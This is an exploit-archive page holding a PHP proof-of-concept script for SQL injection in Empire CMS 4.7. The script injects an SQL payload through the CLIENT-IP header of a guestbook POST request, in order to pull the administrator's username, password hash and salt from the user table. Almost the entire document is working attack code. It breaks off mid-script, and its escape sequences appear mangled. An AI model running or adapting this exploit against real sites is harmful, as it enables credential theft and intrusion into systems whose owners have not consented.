[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Empire CMS 47 SQL Injection
# Published : 2009-10-05
# Author : Securitylab Security Research
# Previous Title : Joomla Soundset 1.0 SQL Injection
# Next Title : Geeklog <= v1.6.0sr2 - Remote File Upload
<?php
print_r("
+------------------------------------------------------------------+
Application Info:
Name: EmpireCMS47
--------------------------------------------
Discoverd By: Securitylab.ir
Contacts: info@securitylab[dot]ir
Note: just work as php>=5&mysql>=4.1
--------------------------------------------
Vulnerability Info:
Sql Injection
Medium Risk
+------------------------------------------------------------------+
");
if ($argc<3) {
echo "Usage: php ".$argv[0]." host path n";
echo "host: target server n";
echo "path: path to EmpireCMS47n";
echo "Example:rn";
echo "php ".$argv[0]." localhost /n";
die;
}
$host=$argv[1];
$path=$argv[2];
$data = "name=11ttt&email=111&call=&lytext=1111&enews=AddGbook";
$cmd = "aaaaaaaa',0,1,''),('t00lsxxxx','t00lsxxxxx','','2008-05-28 15:44:17',(select concat(username,0x5f,password,0x5f,rnd) from phome_enewsuser where
userid=1),'',1,'1111',0,0,'')/*";
$message = "POST ".$path."/e/enews/index.php"." HTTP/1.1rn";
$message .= "Referer: http://".$host.$path."/e/tool/gbook/?bid=1rn";
$message .= "Accept-Language: zh-cnrn";
$message .= "Content-Type: application/x-www-form-urlencodedrn";
$message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)rn";
$message .= "CLIENT-IP: $cmdrn";
$message .= "Host: $hostrn";
$message .= "Content-Length: ".strlen($data)."rn";
$message .= "Cookie: ecmsgbookbid=1;rn";
$message .= "Connection: Closern";
$message .= "rn";
$message .=$data;
$ock=fsockopen($host,80);
if (!$ock) {
echo 'No response from '.$host;
die;
}
echo "[+]connected to the site!rn";
echo "[+]sending data nowa